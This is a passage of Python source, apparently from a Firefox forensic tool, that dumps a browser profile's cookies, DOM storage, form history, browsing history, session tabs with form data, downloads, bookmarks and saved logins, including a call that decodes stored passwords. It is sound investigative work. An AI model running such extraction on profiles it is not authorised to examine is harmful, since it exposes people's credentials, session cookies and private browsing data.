                    print ("Referrer: %s" % tab.get("entries")[i].get("referrer"))
                # Form data may live under 'id' or 'xpath'; print whichever is populated.
                if tab.get("entries")[i].get("formdata") is not None and str(tab.get("entries")[i].get("formdata")) != "{}" :
                    if str(tab.get("entries")[i].get("formdata").get("xpath")) == "{}" and str(tab.get("entries")[i].get("formdata").get("id")) != "{}":
                        print ("Form: %s\n" % tab.get("entries")[i].get("formdata").get("id"))
                    elif str(tab.get("entries")[i].get("formdata").get("xpath")) != "{}" and str(tab.get("entries")[i].get("formdata").get("id")) == "{}":
                        print ("Form: %s\n" % tab.get("entries")[i].get("formdata").get("xpath"))
                    else:
                        print ("Form: %s\n" % tab.get("entries")[i].get("formdata"))
            print ("\n")
            count = count + 1
    if filesession == "js":
        contador['Session1'] = count
    elif filesession == "bak":
        contador['Session2'] = count
##############################################################################################################
def extract_data_session_watch (varDir):
    """Watch-mode variant of the session dump: prints the open tabs plus a
    summary (tab count, forms in use, last update) for the live session."""
    if path.isfile(varDir+"/sessionstore.js") == False and path.isfile(varDir+"/sessionstore.json") == False:
        return
    else:
        if path.isfile(varDir+"/sessionstore.js") == True:
            f = open(varDir+"/sessionstore.js")
        elif path.isfile(varDir+"/sessionstore.json") == True:
            f = open(varDir+"/sessionstore.json")
    filesession = "js"
    jdata = json.loads(f.read())
    f.close()
    count = 0
    countform = 0
    for win in jdata.get("windows"):
        for tab in win.get("tabs"):
            if tab.get("index") is not None:
                # 'index' is 1-based; the 'entries' list is 0-based.
                i = tab.get("index") - 1
                print ("Title: %s" % tab.get("entries")[i].get("title"))
                print ("URL: %s" % tab.get("entries")[i].get("url"))
                if tab.get("entries")[i].get("formdata") is not None and str(tab.get("entries")[i].get("formdata")) != "{}" :
                    countform = countform + 1
                    if str(tab.get("entries")[i].get("formdata").get("xpath")) == "{}" and str(tab.get("entries")[i].get("formdata").get("id")) != "{}":
                        print ("Form: %s\n" % tab.get("entries")[i].get("formdata").get("id"))
                    elif str(tab.get("entries")[i].get("formdata").get("xpath")) != "{}" and str(tab.get("entries")[i].get("formdata").get("id")) == "{}":
                        print ("Form: %s\n" % tab.get("entries")[i].get("formdata").get("xpath"))
                    else:
                        print ("Form: %s\n" % tab.get("entries")[i].get("formdata"))
            print ("\n")
            count = count + 1
    # lastUpdate is stored in milliseconds since the epoch.
    print ("\n\n\n* Last update: %s " % time.ctime(jdata["session"]["lastUpdate"]/1000.0))
    print ("* Number of windows / tabs in use: %s" % count)
    print ("* Number of webs with forms in use: %s" % countform)
    print ("* Exit: Cntrl + c")
##############################################################################################################
def All_execute(varDir):
    """Run every extraction routine against the profile directory varDir.

    Call order is preserved as-is; each helper prints its own section.
    """
    show_cookies_firefox(varDir,varDom = 0)   # varDom=0 also dumps DOM storage
    show_permissions_firefox(varDir)
    show_preferences_firefox(varDir)
    show_addons_firefox(varDir)
    show_extensions_firefox(varDir)
    show_search_engines(varDir)
    show_info_addons(varDir)
    show_downloads_firefox(varDir)
    show_downloads_history_firefox(varDir)
    show_downloadsdir_firefox(varDir)
    show_forms_firefox(varDir)
    show_history_firefox(varDir)
    show_bookmarks_firefox(varDir)
    show_passwords_firefox(varDir)
    show_cache_offline(varDir)
    show_cert_override(varDir)
    show_thumbnails(varDir)
    show_session(varDir)
###############################################################################################################
def show_cookies_firefox(varDir, varDom = 1, varDomain = "%",varName = "%",varHost = "%", varLastacess = "%", varCreate = "%", varSecure = "%", varHttp = "%", varRangeLast1 = "1991-08-06 00:00:00", varRangeLast2 = "3000-01-01 00:00:00",varRangeCreate1 = "1991-08-06 00:00:00", varRangeCreate2 = "3000-01-01 00:00:00"):
    """Dump cookies (and, when varDom == 0, DOM storage) from the profile's
    SQLite databases; every var* parameter is a SQL LIKE pattern or range
    bound fed directly into the WHERE clause. Counts go to 'contador'."""
    count = 0
    if sys.platform.startswith('win') == True:
        bbdd = varDir+"\\cookies.sqlite"
    else:
        bbdd = varDir+"/cookies.sqlite"
    if path.isfile(bbdd) == False:
        print ("[ERROR]: Cookies database not found !")
        return
    show_title("Cookies "+show_sha256(bbdd), 302)
    conn = sqlite3.connect(bbdd)
    conn.text_factory = str
    cursor = conn.cursor()
    # Parameterised filter over moz_cookies; expiry/lastAccessed/creationTime
    # are converted from (micro)seconds-since-epoch to local time in SQL.
    cursor.execute("select baseDomain, name, value, host, path, datetime(expiry, 'unixepoch', 'localtime'), datetime(lastAccessed/1000000,'unixepoch','localtime') as last ,datetime(creationTime/1000000,'unixepoch','localtime') as creat, isSecure, isHttpOnly FROM moz_cookies where baseDomain like ? escape '\\' and name like ? escape '\\' and host like ? escape '\\' and last like ? and creat like ? and isSecure like ? and isHttpOnly like ? and last between ? and ? and creat between ? and ?",[varDomain,varName,varHost,('%'+varLastacess+'%'),('%'+varCreate+'%'),varSecure,varHttp, varRangeLast1, varRangeLast2, varRangeCreate1,varRangeCreate2])
    for row in cursor:
        print('Domain: %s' % row[0])
        print('Host: %s' % row[3])
        print('Name: %s' % row[1])
        print('Value: %s' % row[2])
        print('Path: %s' % row[4])
        print('Expiry: %s' % row[5])
        print('Last acess: %s' % row[6])
        print('Creation Time: %s' % row[7])
        if row[8] == 0:
            print('Secure: No')
        else:
            print('Secure: Yes')
        if row[9] == 0:
            print('HttpOnly: No')
        else:
            print('HttpOnly: Yes')
        print("\n")
        count = count +1
    contador['Cookies'] = count
    contador['DOMshow'] = "WARNING: For show the DOM storage data , use the option -showdom"
    # DOM storage dump (webappsstore.sqlite) when explicitly requested.
    if varDom == 0:
        count = 0
        if sys.platform.startswith('win') == True:
            bbdd = varDir+"\\webappsstore.sqlite"
        else:
            bbdd = varDir+"/webappsstore.sqlite"
        if path.isfile(bbdd) == False:
            print ("[ERROR]: Webappsstore database not found !")
            return
        show_title("DOM Storage "+show_sha256(bbdd), 302)
        conn = sqlite3.connect(bbdd)
        conn.text_factory = str
        cursor = conn.cursor()
        cursor.execute("select scope,value from webappsstore2")
        for row in cursor:
            # 'scope' is stored reversed (and suffixed); undo that to get the domain.
            if row[0].find("http") == -1:
                print('Domain: %s' % path.split(row[0][::-1])[1][1:])
            if row[0].startswith("/") == False and row[0].find("http") != -1:
                print('Domain: %s' % path.split(row[0][::-1])[1].rsplit(':.', 1)[1])
            print('DOM data: %s' % row[1])
            print ("\n------------------------\n")
            count = count +1
        contador['DOM'] = count
    cursor.close()
    conn.close()
###############################################################################################################
def show_permissions_firefox(varDir,varHostPreferences = "%"):
	"""Dump site permissions stored in permissions.sqlite (moz_hosts).

	varDir            -- profile directory.
	varHostPreferences -- SQL LIKE filter applied to the host column.
	Stores the number of rows printed in the global contador['Preferences'].
	"""
	sep = "\\" if sys.platform.startswith('win') else "/"
	bbdd = varDir + sep + "permissions.sqlite"
	if not path.isfile(bbdd):
		print ("[ERROR]: Permissions database not found !")
		return
	show_title("Permissions "+show_sha256(bbdd), 302)
	conn = sqlite3.connect(bbdd)
	conn.text_factory = str
	cursor = conn.cursor()
	cursor.execute("select host,type,permission,expireType,datetime(expireTime/1000,'unixepoch','localtime') from moz_hosts where host like ? escape '\\'",[varHostPreferences])
	total = 0
	for host, perm_type, permission, expire_type, expire_time in cursor:
		print('Host: %s' % host)
		print('Type: %s' % perm_type)
		print('Permission: %s' % permission)
		# expireType 0 means the permission never expires.
		if expire_type == 0:
			print('Not expire')
		else:
			print('Expire Time: %s' % expire_time)
		print("\n")
		total = total + 1
	contador['Preferences'] = total
	cursor.close()
	conn.close()
def show_preferences_firefox(varDir):
	"""Parse prefs.js in the profile directory and print browser, download
	and proxy preferences.  Handles both Firefox and Seamonkey profiles.
	"""
	if sys.platform.startswith('win') == True:
		dirprefs = "\\prefs.js"
	else:
		dirprefs = "/prefs.js"
	if path.isfile(varDir+dirprefs) == False:
		print ("[ERROR]: prefs.js not found !")
		return
	show_title("Preferences "+show_sha256(varDir+dirprefs), 302)
	firefox = 0
	seamonkey = 1
	# Each pref line looks like: user_pref("name", value);
	# line.split()[1][:-2] extracts the value token and strips the trailing
	# ');'; the .replace strips the surrounding double quotes.
	for line in open(varDir+dirprefs):
		if "extensions.lastAppVersion" in line:
			seamonkey = line.split()[1][:-2].replace("\"", "")
			print ("\nBrowser Version: "+line.split()[1][:-2].replace("\"", ""))
		if "extensions.lastPlatformVersion" in line and seamonkey != line.split()[1][:-2].replace("\"", ""): # Only Seamonkey
			print ("Firefox Version: "+line.split()[1][:-2].replace("\"", ""))
		# NOTE: order matters below -- the 'backup' and '_port' variants are
		# tested before their shorter substrings so the more specific
		# preference name wins the elif chain.
		if "browser.download.dir" in line:
			print ("\nDownload directory: "+line.split()[1][:-2].replace("\"", ""))
		elif "browser.download.lastDir" in line:
			print ("Last Download directory: "+line.split()[1][:-2].replace("\"", ""))
		elif "browser.cache.disk.capacity" in line:
			print ("Browser cache disk capacity: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.backup.ftp_port" in line:
			print ("FTP backup proxy port: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.backup.ftp" in line:
			print ("\nFTP backup proxy: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.backup.socks_port" in line:
			print ("Socks backup proxy port: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.backup.socks" in line:
			print ("Socks backup proxy: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.backup.ssl_port" in line:
			print ("SSL backup proxy port: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.backup.ssl" in line:
			print ("SSL backup proxy: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.ftp_port" in line:
			print ("FTP proxy port: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.ftp" in line:
			print ("FTP proxy: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.socks_port" in line:
			print ("Socks proxy port: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.socks" in line:
			print ("Socks proxy: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.ssl_port" in line:
			print ("SSL proxy port: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.ssl" in line:
			print ("SSL proxy: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.http_port" in line:
			print ("Http proxy port: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.http" in line:
			print ("Http proxy: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.share_proxy_settings" in line:
			print ("Share proxy settings: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.autoconfig_url" in line:
			print ("\nURL proxy autoconfig: "+line.split()[1][:-2].replace("\"", ""))
		elif "network.proxy.type" in line:
			print ("Type Proxy: "+line.split()[1][:-2].replace("\"", "")+" (0: No proxy | 4: Auto detect settings | 1: Manual configuration | 2: URL autoconfig)")
###############################################################################################################
def show_addons_firefox(varDir):
	"""Dump the installed addons recorded in addons.sqlite.

	Prints name, version, creator URL and homepage URL for every row of the
	'addon' table and stores the row count in contador['Addons'].
	"""
	count = 0
	if sys.platform.startswith('win') == True:
		bbdd = varDir+"\\addons.sqlite"
	else:
		bbdd = varDir+"/addons.sqlite"
	if path.isfile(bbdd) == False:
		print ("[ERROR]: Addons database not found !")
		return
	show_title("Addons "+show_sha256(bbdd), 302)
	conn = sqlite3.connect(bbdd)
	conn.text_factory = str
	cursor = conn.cursor()
	cursor.execute("select name,version,creatorURL,homepageURL from addon")
	for row in cursor:
		print('Name: %s' % row[0])
		# BUG FIX: the columns were previously printed in the wrong order
		# (row[3] as Version, row[1] as Creator URL, row[2] as Homepage URL);
		# they now match the SELECT column order.
		print('Version: %s' % row[1])
		print('Creator URL: %s' % row[2])
		print('Homepage URL: %s' % row[3])
		print("\n")
		count = count +1
	contador['Addons'] = count
	cursor.close()
	conn.close()
def show_extensions_firefox(varDir):
	"""Dump the extensions/themes recorded in extensions.sqlite.

	Prints one record per row of the 'addon' table and stores the number of
	rows in the global contador['Extensions'].
	"""
	sep = "\\" if sys.platform.startswith('win') else "/"
	bbdd = varDir + sep + "extensions.sqlite"
	if not path.isfile(bbdd):
		print ("[ERROR]: Extensions database not found !")
		return
	show_title("Extensions "+show_sha256(bbdd), 302)
	conn = sqlite3.connect(bbdd)
	conn.text_factory = str
	cursor = conn.cursor()
	cursor.execute("select type, descriptor,version,releaseNotesURI,datetime(installDate/1000,'unixepoch','localtime'),datetime(UpdateDate/1000,'unixepoch','localtime'),active from addon")
	total = 0
	for ext_type, descriptor, version, release, installed, updated, active in cursor:
		print('Type: %s' % ext_type)
		print('Descriptor: %s' % descriptor)
		print('Version: %s' % version)
		print('Release: %s' % release)
		print('Install date: %s' % installed)
		print('Update date: %s' % updated)
		print('Active: %d' % active)
		print("\n")
		total = total + 1
	contador['Extensions'] = total
	cursor.close()
	conn.close()
def show_info_addons(varDir):
	"""Print the applications and the URLs/paths they reference, taken from
	localstore.rdf in the profile directory.
	"""
	sep = "\\" if sys.platform.startswith('win') else "/"
	filepath = varDir + sep + "localstore.rdf"
	if not path.isfile(filepath):
		print ("[ERROR]: File localstore.rdf not found !")
		return
	filead = open(filepath)
	show_title("Addons (URLS/PATHS) "+show_sha256(filepath), 302)
	lines = filead.readlines()
	# Skip the three-line XML header; y remembers the last matching header
	# index so we can tell afterwards whether anything was printed.
	i = 3
	y = 0
	while i != len(lines):
		# A line of interest contains a URL ("tp://"), a Unix path in a
		# label attribute, or a Windows drive path.
		if lines[i].find("tp://") != -1 or lines[i].find('label="/') != -1 or lines[i].find(':\\') != -1:
			# Walk backwards to the RDF:Description element naming the app.
			y = i - 1
			while lines[y].find("RDF:Description RDF:about=") == -1:
				y = y - 1
			print ("APP: "+lines[y].replace('<RDF:Description RDF:about="', "").replace('"', "").replace("	","")+"URL/PATH: "+lines[i].replace('" />', "").replace('label="', " ").replace("	","")+"\n")
		i = i + 1
	if y == 0:
		print ("The file localstore.rdf does not contain URLs or paths !")
def show_search_engines(varDir):
	"""Dump the installed search engines from search.sqlite (engine_data).

	Stores the number of rows printed in contador['SearchEngines'].
	"""
	sep = "\\" if sys.platform.startswith('win') else "/"
	bbdd = varDir + sep + "search.sqlite"
	if not path.isfile(bbdd):
		print ("[ERROR]: Search engines database not found !")
		return
	show_title("Search Engines "+show_sha256(bbdd), 302)
	conn = sqlite3.connect(bbdd)
	conn.text_factory = str
	cursor = conn.cursor()
	cursor.execute("select name, value from engine_data")
	total = 0
	for name, value in cursor:
		print('Name: %s' % name)
		print('Value: %s' % str(value))
		print("\n")
		total = total + 1
	contador['SearchEngines'] = total
	cursor.close()
	conn.close()
###############################################################################################################
def show_downloads_firefox(varDir, varDownloadRange1 = "1991-08-06 00:00:00", varDownloadRange2 = "3000-01-01 00:00:00"):
	"""Dump downloads recorded in downloads.sqlite (moz_downloads).

	Only rows whose start time falls between varDownloadRange1 and
	varDownloadRange2 are shown.  Stores the row count in
	contador['Downloads'].
	"""
	count = 0
	if sys.platform.startswith('win') == True:
		bbdd = varDir+"\\downloads.sqlite"
	else:
		bbdd = varDir+"/downloads.sqlite"
	if path.isfile(bbdd) == False:
		print ("[ERROR]: Downloads database not found !")
		return
	show_title("Downloads "+show_sha256(bbdd), 302)
	conn = sqlite3.connect(bbdd)
	conn.text_factory = str
	cursor = conn.cursor()
	cursor.execute("select name,mimeType,maxBytes/1024,source,target,referrer,tempPath, datetime(startTime/1000000,'unixepoch','localtime') as start,datetime(endTime/1000000,'unixepoch','localtime') as end,state,preferredApplication,preferredAction from moz_downloads where start between ? and ?",[varDownloadRange1,varDownloadRange2])
	for row in cursor:
		print('Name: %s' % row[0])
		print('Mime: %s' % row[1])
		print('Size (KB): %d' % row[2])
		print('Source: %s' % row[3])
		print('Download directory: %s' % row[4])
		print('Referrer: %s' % row[5])
		print('Path temp: %s' % row[6])
		print('startTime: %s' % row[7])
		print('Endtime: %s' % row[8])
		print('State (4 pause, 3 cancell, 1 completed, 0 downloading): %s' % row[9])
		print('Preferred application: %s' % row[10])
		print('Preferred action: %d' % row[11])
		print ("\n")
		count = count +1
	contador['Downloads'] = count
	# FIX: close the cursor and connection (previously leaked; every other
	# database helper in this file closes them).
	cursor.close()
	conn.close()
def show_downloads_history_firefox(varDir, varDownloadRange1 = "1991-08-06 00:00:00", varDownloadRange2 = "3000-01-01 00:00:00"):
	"""Dump download history stored as annotations in places.sqlite
	(moz_annos joined with moz_places), limited to the given date range.
	Stores the row count in contador['Downloads_History'].
	"""
	count = 0
	if sys.platform.startswith('win') == True:
		bbdd = varDir+"\\places.sqlite"
	else:
		bbdd = varDir+"/places.sqlite"
	if path.isfile(bbdd) == False:
		print ("[ERROR]: History Downloads database not found !")
		return
	show_title("History Downloads "+show_sha256(bbdd), 302)
	conn = sqlite3.connect(bbdd)
	conn.text_factory = str
	cursor = conn.cursor()
	cursor.execute('select datetime(ann.lastModified/1000000,"unixepoch","localtime") as modified, moz.url, ann.content from moz_annos ann, moz_places moz where moz.id=ann.place_id and ann.content not like "UTF-%" and ann.content not like "ISO-%" and ann.content like "file%" and modified between ? and ?',[varDownloadRange1,varDownloadRange2])
	for row in cursor:
		print('Date: %s' % row[0])
		print('URL: %s' % row[1])
		print('Download: %s' % row[2])
		print ("\n")
		count = count +1
	contador['Downloads_History'] = count
	# FIX: close the cursor and connection (previously leaked; every other
	# database helper in this file closes them).
	cursor.close()
	conn.close()
def show_downloadsdir_firefox(varDir):
	"""Show the distinct download directories recorded in
	content-prefs.sqlite (prefs table, values starting with '/').
	"""
	sep = "\\" if sys.platform.startswith('win') else "/"
	bbdd = varDir + sep + "content-prefs.sqlite"
	if not path.isfile(bbdd):
		print ("[ERROR]: Download directories database not found !")
		return
	show_title("Directories "+show_sha256(bbdd), 302)
	conn = sqlite3.connect(bbdd)
	conn.text_factory = str
	cursor = conn.cursor()
	cursor.execute('select distinct value from prefs where value like "/%"')
	for (valor,) in cursor:
		print('Downloads directories: %s' % valor)
	cursor.close()
	conn.close()
###############################################################################################################
def show_forms_firefox(varDir,varFormsValue = '%', varFormRange1 = "1991-08-06 00:00:00",varFormRange2 = "3000-01-01 00:00:00" ):
	"""Dump saved form-history entries from formhistory.sqlite, filtered by
	value (SQL LIKE) and by first-use date range.  Stores the row count in
	contador['Forms'].
	"""
	sep = "\\" if sys.platform.startswith('win') else "/"
	bbdd = varDir + sep + "formhistory.sqlite"
	if not path.isfile(bbdd):
		print ("[ERROR]: Forms database not found !")
		return
	show_title("Forms "+show_sha256(bbdd), 302)
	conn = sqlite3.connect(bbdd)
	cursor = conn.cursor()
	cursor.execute("select fieldname,value,timesUsed,datetime(firstUsed/1000000,'unixepoch','localtime') as last,datetime(lastUsed/1000000,'unixepoch','localtime') from moz_formhistory where value like ? escape '\\' and last between ? and ?",[varFormsValue,varFormRange1,varFormRange2])
	total = 0
	for fieldname, value, times_used, first_used, last_used in cursor:
		print('Name: %s' % fieldname)
		print('Value: %s' % value)
		print('Times Used: %d' % times_used)
		print('First Used: %s' % first_used)
		print('LastUsed: %s' % last_used)
		print("\n")
		total = total + 1
	contador['Forms'] = total
	cursor.close()
	conn.close()
###############################################################################################################
def show_history_firefox(varDir, varURL = '%', varFrequency = 1, varTitle = '%', varDate = '%', varRange1 = "1991-08-06 00:00:00", varRange2 = "3000-01-01 00:00:00"):
	"""Dump browsing history from places.sqlite (moz_places).

	Filters by URL substring, title, date and date range.  When
	varFrequency is 0 (the -frequency flag) rows are ordered by visit count
	instead of by last-visit date.  Stores the row count in
	contador['History'].
	"""
	count = 0
	if sys.platform.startswith('win') == True:
		bbdd = varDir+"\\places.sqlite"
	else:
		bbdd = varDir+"/places.sqlite"
	if path.isfile(bbdd) == False:
		print ("[ERROR]: History database not found !")
		return
	show_title("History "+show_sha256(bbdd), 302)
	conn = sqlite3.connect(bbdd)
	cursor = conn.cursor()
	if varFrequency == 1:
		cursor.execute("select datetime(last_visit_date/1000000,'unixepoch','localtime') as last, title, url, visit_count from moz_places where url like ? and title like ? escape '\\' and (last like ? and last is not null) and last between ? and ? ORDER BY last COLLATE NOCASE ",[('%'+varURL+'%'), varTitle,('%'+varDate+'%'),varRange1,varRange2])
	else:
		# BUG FIX: the original query read "where url like ? title like ?"
		# (missing 'and'), so the -frequency option always failed with a
		# SQL syntax error.
		cursor.execute("select datetime(last_visit_date/1000000,'unixepoch','localtime') as last, title, url, visit_count from moz_places where url like ? and title like ? escape '\\' and (last like ? and last is not null) and last between ? and ? ORDER BY visit_count COLLATE NOCASE DESC",[('%'+varURL+'%'), varTitle,('%'+varDate+'%'),varRange1,varRange2])
	for row in cursor:
		print('Last visit: %s' % row[0])
		print('Title: %s' % row[1])
		print('URL: %s' % row[2])
		print('Frequency: %d' % row[3])
		print("\n")
		count = count +1
	contador['History'] = count
	cursor.close()
	conn.close()
###############################################################################################################
def show_bookmarks_firefox(varDir, varBookmarkRange1 = "1991-08-06 00:00:00", varBookmarkRange2 = "3000-01-01 00:00:00"):
	"""Dump bookmarks from places.sqlite (moz_bookmarks joined with
	moz_places), limited to entries last modified inside the given range.
	Stores the row count in contador['Bookmarks'].
	"""
	sep = "\\" if sys.platform.startswith('win') else "/"
	bbdd = varDir + sep + "places.sqlite"
	if not path.isfile(bbdd):
		print ("[ERROR]: Bookmarks database not found !")
		return
	show_title("Bookmarks "+show_sha256(bbdd), 302)
	conn = sqlite3.connect(bbdd)
	cursor = conn.cursor()
	cursor.execute('select bm.title,pl.url,datetime(bm.dateAdded/1000000,"unixepoch","localtime"),datetime(bm.lastModified/1000000,"unixepoch","localtime") as last from moz_places pl,moz_bookmarks bm where bm.fk=pl.id and last between ? and ?',[varBookmarkRange1,varBookmarkRange2] )
	total = 0
	for title, url, date_add, last_modified in cursor:
		print('Title: %s' % title)
		print('URL: %s' % url)
		print('Date add: %s' % date_add)
		print('Last modified: %s' % last_modified)
		print("\n")
		total = total + 1
	contador['Bookmarks'] = total
	cursor.close()
	conn.close()
###############################################################################################################
def show_passwords_firefox(varDir):
	"""Dump password exceptions and (encrypted) saved logins from
	signons.sqlite.  On Unix with Python 2.x the stored logins are also
	decoded via readsignonDB (defined elsewhere in this file, uses libnss).
	Stores the number of logins in contador['Passwords'].
	"""
	count = 0
	if sys.platform.startswith('win') == True:
		bbdd = varDir+"\\signons.sqlite"
	else:
		bbdd = varDir+"/signons.sqlite"
	if path.isfile(bbdd) == False:
		print ("[ERROR]: Signons database not found !")
		return
	show_title("Exceptions/Passwords "+show_sha256(bbdd), 302)
	conn = sqlite3.connect(bbdd)
	cursor = conn.cursor()
	# Sites for which the user refused to save passwords.
	cursor.execute('select hostname from moz_disabledHosts')
	for row in cursor:
		print('Exception Web: %s' % row[0])
	print ("\n")
	# Saved logins; user/password are NSS-encrypted blobs.
	cursor.execute('select formSubMitURL,usernameField,passwordField ,encryptedUsername,encryptedPassword,encType,datetime(timeCreated/1000,"unixepoch","localtime"),datetime(timeLastUsed/1000,"unixepoch","localtime"),datetime(timePasswordChanged/1000,"unixepoch","localtime"),timesUsed FROM moz_logins')
	for row in cursor:
		print('Web: %s' % row[0])
		print('User field: %s' % row[1])
		print('Password field: %s' % row[2])
		print('User login (crypted): %s' % row[3])
		print('Password login (crypted): %s' % row[4])
		#print('Encripton type: %s' % row[5])
		print('Created: %s' % row[6])
		print('Last used: %s' % row[7])
		print('Change: %s' % row[8])
		print('Frequency: %s' % row[9])
		print("\n")
		count = count +1
	contador['Passwords'] = count
	# Decoding requires libnss via ctypes: only attempted on Unix + Python 2.
	if sys.platform.startswith('win') == False and sys.version.startswith('2.') == True and count > 0:
		readsignonDB(varDir)
	elif count == 0:
		print ("Users not found!")
	else:
		print ("WARNING: Decode password only in GNU/Linux with python 2.x\nEXAMPLE: python2.7 dumpzilla.py yle8qt6e.default --Passwords")
	cursor.close()
	conn.close()
###############################################################################################################
def show_cache_offline(varDir,varCacheoffRange1 = "1991-08-06 00:00:00", varCacheoffRange2 = "3000-01-01 00:00:00"):
	"""Dump HTML5 offline-cache entries from OfflineCache/index.sqlite,
	limited to entries last modified within the given date range.
	Stores the row count in contador['Cacheoffline'].
	"""
	if sys.platform.startswith('win'):
		bbdd = varDir+"\\OfflineCache\\index.sqlite"
	else:
		bbdd = varDir+"/OfflineCache/index.sqlite"
	if not path.isfile(bbdd):
		print ("[ERROR]: Cache Offline (HTML5) database not found !")
		return
	show_title("Cache offline Html5 "+show_sha256(bbdd), 302)
	conn = sqlite3.connect(bbdd)
	cursor = conn.cursor()
	cursor.execute("select ClientID,key,DataSize,FetchCount,datetime(LastFetched/1000000,'unixepoch','localtime'),datetime(LastModified/1000000,'unixepoch','localtime') as last,datetime(ExpirationTime/1000000,'unixepoch','localtime') from moz_cache where last between ? and ?",[varCacheoffRange1,varCacheoffRange2])
	total = 0
	for url, key, size, fetches, fetched, modified, expires in cursor:
		print('Url: %s' % url)
		print('File: %s' % key)
		print('Data Size: %s' % size)
		print('FetchCount: %s' % fetches)
		print('Last Fetched: %s' % fetched)
		print('Last Modified: %s' % modified)
		print('Expiration: %s' % expires)
		print("\n")
		total = total + 1
	cursor.close()
	conn.close()
	contador['Cacheoffline'] = total
##############################################################################################################
def show_cache_offline_extract(varDir, directory):
	"""Copy the HTML5 offline-cache files into 'directory', sorted by MIME
	type (files_gzip/, images/, text/, or the top level).  Uses the
	third-party 'magic' module for type detection; on Windows it needs the
	'magicpath' magic database defined in the file header.
	Stores the number of copied files in contador['Cacheoffline_extract'].
	"""
	import magic
	count = 0
	if sys.platform.startswith('win') == True:
		dircacheextract = "\\OfflineCache"
	else:
		dircacheextract = "/OfflineCache/"
	if not path.exists(varDir+dircacheextract):
		print ("[ERROR]: OfflineCache not found !")
		return
	if sys.platform.startswith('win') == True: # Windows
		for dirname, dirnames, filenames in walk(varDir+dircacheextract):
			for filename in filenames:
				file = path.join(dirname, filename)
				mime = magic.Magic(magic_file=magicpath)
				if not path.exists(directory):
					makedirs(directory)
				if mime.from_file(file).decode('unicode-escape').startswith("gzip"):
					if not path.exists(directory+"\\files_gzip"):
						makedirs(directory+"\\files_gzip")
					shutil.copy2(file, directory+"\\files_gzip\\"+filename+".gz")
				elif mime.from_file(file).decode('unicode-escape').find("image") != -1 :
					if not path.exists(directory+"\\images"):
						makedirs(directory+"\\images")
					if mime.from_file(file).decode('unicode-escape').find("JPEG") != -1 or mime.from_file(file).decode('unicode-escape').find("jpg") != -1:
						shutil.copy2(file, directory+"\\images\\"+filename+".jpg")
					elif mime.from_file(file).decode('unicode-escape').find("GIF") != -1:
						shutil.copy2(file, directory+"\\images\\"+filename+".gif")
					elif mime.from_file(file).decode('unicode-escape').find("BMP") != -1:
						shutil.copy2(file, directory+"\\images\\"+filename+".bmp")
					elif mime.from_file(file).decode('unicode-escape').find("PNG") != -1:
						shutil.copy2(file, directory+"\\images\\"+filename+".png")
					elif mime.from_file(file).decode('unicode-escape').find("X-ICON") != -1:
						shutil.copy2(file, directory+"\\images\\"+filename+".ico")
					else:
						# BUG FIX: this fallback used Unix separators
						# ("/images/") inside the Windows branch.
						shutil.copy2(file, directory+"\\images\\"+filename)
				elif mime.from_file(file).decode('unicode-escape').find("text") != -1:
					if not path.exists(directory+"\\text"):
						makedirs(directory+"\\text")
					shutil.copy2(file, directory+"\\text\\"+filename+".txt")
				else:
					shutil.copy2(file, directory+"\\"+filename)
				count = count + 1
				if filename != "index.sqlite":
					print ("Copying "+filename+": "+mime.from_file(file).decode('unicode-escape'))
		# index.sqlite is copied along with the cache files but is not a
		# cached resource: drop it from the count and from the output dir.
		contador['Cacheoffline_extract'] = count -1
		remove(directory+"\\index.sqlite")
	else: # Unix systems
		for dirname, dirnames, filenames in walk(varDir+dircacheextract):
			for filename in filenames:
				file = path.join(dirname, filename)
				mime = magic.Magic(mime=True)
				if not path.exists(directory):
					makedirs(directory)
				if mime.from_file(file).decode('unicode-escape') == "application/x-gzip":
					if not path.exists(directory+"/files_gzip/"):
						makedirs(directory+"/files_gzip/")
					shutil.copy2(file, directory+"/files_gzip/"+filename+".gz")
				elif mime.from_file(file).decode('unicode-escape').startswith("image"):
					if not path.exists(directory+"/images/"):
						makedirs(directory+"/images/")
					if mime.from_file(file).decode('unicode-escape').find("jpeg") != -1 or mime.from_file(file).decode('unicode-escape').find("jpg") != -1:
						shutil.copy2(file, directory+"/images/"+filename+".jpg")
					elif mime.from_file(file).decode('unicode-escape').find("gif") != -1:
						shutil.copy2(file, directory+"/images/"+filename+".gif")
					elif mime.from_file(file).decode('unicode-escape').find("bmp") != -1:
						shutil.copy2(file, directory+"/images/"+filename+".bmp")
					elif mime.from_file(file).decode('unicode-escape').find("png") != -1:
						shutil.copy2(file, directory+"/images/"+filename+".png")
					elif mime.from_file(file).decode('unicode-escape').find("x-icon") != -1:
						shutil.copy2(file, directory+"/images/"+filename+".ico")
					else:
						shutil.copy2(file, directory+"/images/"+filename)
				elif mime.from_file(file).decode('unicode-escape').startswith("text"):
					if not path.exists(directory+"/text/"):
						makedirs(directory+"/text/")
					shutil.copy2(file, directory+"/text/"+filename+".txt")
				else:
					shutil.copy2(file, directory+"/"+filename)
				count = count + 1
		contador['Cacheoffline_extract'] = count -1
		remove(directory+"/index.sqlite")
##############################################################################################################
def show_thumbnails(varDir, directory = "null"):
	"""List the thumbnail images of the profile; when 'directory' is given
	(anything other than the sentinel "null"), copy them into it.
	Stores the number of thumbnails in contador['Thumbnails'].
	"""
	dthumbails = "\\thumbnails" if sys.platform.startswith('win') else "/thumbnails/"
	if not path.exists(varDir+dthumbails):
		print ("[ERROR]: Thumbnails not found !")
		return
	show_title("Thumbnails images", 243)
	total = 0
	for dirname, dirnames, filenames in walk(varDir+dthumbails):
		for filename in filenames:
			file = path.join(dirname, filename)
			if directory == 'null':
				print (file)
			else:
				if not path.exists(directory):
					makedirs(directory)
